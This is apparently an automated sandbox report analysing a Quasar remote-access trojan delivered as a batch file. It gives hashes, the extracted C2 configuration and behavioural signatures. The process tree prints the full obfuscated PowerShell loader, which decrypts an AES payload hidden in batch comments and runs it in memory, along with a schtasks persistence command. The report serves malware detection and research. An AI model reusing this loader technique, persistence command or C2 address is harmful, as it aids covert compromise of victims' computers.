Analysis

max time kernel: 133s
max time network: 136s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 24-06-2024 23:07

Static task: static1
Behavioral task: behavioral1 (sample: Uni.bat, resource: win10-20240404-en)
Behavioral task: behavioral2 (sample: Uni.bat, resource: win10v2004-20240611-en)
General

Target: Uni.bat
Size: 253KB
MD5: 6116316574a1311a2e768ef21255430d
SHA1: 684dec7251dbacf3e3b5a3cac0492df268f7f9a3
SHA256: f975a314f9f0ac6527acf5098bd0c9ce8800c05b83ce3c5af01c1cb8e3bbbd5b
SHA512: daf318e0dde57bf13b2b30bdff1556749caf3ebda2cffd5ead57c2c998aae763214226121f02996d48bcea54d53b9c2c352c21a8638b0d42f36c8f41896be2f2
SSDEEP: 3072:PfaskbNKw91ey00VTUsMHdJmMQ5C6QCf8qb/qV3/PJHnigpqoineD/QrM47f9Jms:nef9NVbkd5UzZfYh6n7P7KK2X78EM
Malware Config

Extracted
family: quasar
version: 3.0.1
botnet: Office04
c2: wireless-boston.gl.at.ply.gg:41366
mutex: QSR_MUTEX_W1ckGYHOGswdBegmKd
encryption_key: QbY1WN4Surh1trMXzt97
install_name: system.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: system
subdirectory: SubDir
Signatures

Quasar payload (1 IoC)
Processes:
  resource                                                                      yara_rule
  behavioral1/memory/2952-34-0x000001D8C15C0000-0x000001D8C161E000-memory.dmp   family_quasar

Executes dropped EXE (2 IoCs)
Processes:
  pid    process
  2952   Uni.bat.exe
  4772   system.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow   ioc
  1      ip-api.com

Drops file in System32 directory (2 IoCs)
Processes:
  description                    ioc                                      process
  File created                   C:\Windows\SysWOW64\SubDir\system.exe    Uni.bat.exe
  File opened for modification   C:\Windows\SysWOW64\SubDir\system.exe    Uni.bat.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
  pid    process
  2952   Uni.bat.exe
  2952   Uni.bat.exe
  2952   Uni.bat.exe
  4772   system.exe
  4772   system.exe
  4772   system.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description               pid    process
  Token: SeDebugPrivilege   2952   Uni.bat.exe
  Token: SeDebugPrivilege   4772   system.exe

Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
  description                         pid    process       target process
  PID 612 wrote to memory of 2892     612    cmd.exe       net.exe
  PID 612 wrote to memory of 2892     612    cmd.exe       net.exe
  PID 2892 wrote to memory of 2316    2892   net.exe       net1.exe
  PID 2892 wrote to memory of 2316    2892   net.exe       net1.exe
  PID 612 wrote to memory of 2952     612    cmd.exe       Uni.bat.exe
  PID 612 wrote to memory of 2952     612    cmd.exe       Uni.bat.exe
  PID 2952 wrote to memory of 1616    2952   Uni.bat.exe   schtasks.exe
  PID 2952 wrote to memory of 1616    2952   Uni.bat.exe   schtasks.exe
  PID 2952 wrote to memory of 4772    2952   Uni.bat.exe   system.exe
  PID 2952 wrote to memory of 4772    2952   Uni.bat.exe   system.exe

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\system32\cmd.exe
  command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    command: net file
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      command: C:\Windows\system32\net1 file

  C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
    command: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $LUjXk = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pfSAb in $LUjXk) { if ($pfSAb.StartsWith(':: ')) { $ysrPJ = $pfSAb.Substring(3); break; }; };$ydMoK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ysrPJ);$QmOjg = New-Object System.Security.Cryptography.AesManaged;$QmOjg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QmOjg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QmOjg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8JDdwdCN8f9GIQeixAyEv80OWR2XU9cSTyINtWtC9E=');$QmOjg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZMxKZ063xFXq46C7vuYyiQ==');$FoDTE = $QmOjg.CreateDecryptor();$ydMoK = $FoDTE.TransformFinalBlock($ydMoK, 0, $ydMoK.Length);$FoDTE.Dispose();$QmOjg.Dispose();$bzYHg = New-Object System.IO.MemoryStream(, $ydMoK);$EACsF = New-Object System.IO.MemoryStream;$cWBZp = New-Object System.IO.Compression.GZipStream($bzYHg, [IO.Compression.CompressionMode]::Decompress);$cWBZp.CopyTo($EACsF);$cWBZp.Dispose();$bzYHg.Dispose();$EACsF.Dispose();$ydMoK = $EACsF.ToArray();$fFqIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ydMoK);$sWumU = $fFqIs.EntryPoint;$sWumU.Invoke($null, (, [string[]] ('')))
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SYSTEM32\schtasks.exe
      command: "schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" /rl HIGHEST /f
      - Scheduled Task/Job: Scheduled Task

    C:\Windows\SysWOW64\SubDir\system.exe
      command: "C:\Windows\SysWOW64\SubDir\system.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
Filesize: 435KB
MD5: f7722b62b4014e0c50adfa9d60cafa1c
SHA1: f31c17e0453f27be85730e316840f11522ddec3e
SHA256: ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512: 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sh1eofh1.l0q.ps1
Filesize: 1B
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Memory dumps:
  file                                                             filesize
  memory/2952-34-0x000001D8C15C0000-0x000001D8C161E000-memory.dmp  376KB
  memory/2952-35-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB
  memory/2952-16-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB
  memory/2952-15-0x000001D8C1540000-0x000001D8C15B6000-memory.dmp  472KB
  memory/2952-9-0x000001D8A9340000-0x000001D8A9362000-memory.dmp   136KB
  memory/2952-32-0x000001D8C14C0000-0x000001D8C14F4000-memory.dmp  208KB
  memory/2952-7-0x00007FFA76483000-0x00007FFA76484000-memory.dmp   4KB
  memory/2952-14-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB
  memory/2952-36-0x000001D8C1640000-0x000001D8C1652000-memory.dmp  72KB
  memory/2952-37-0x000001D8C2E20000-0x000001D8C2E5E000-memory.dmp  248KB
  memory/2952-94-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB
  memory/4772-50-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB
  memory/4772-77-0x0000019DD5140000-0x0000019DD517C000-memory.dmp  240KB
  memory/4772-49-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB
  memory/4772-96-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB
  memory/4772-97-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp  9.9MB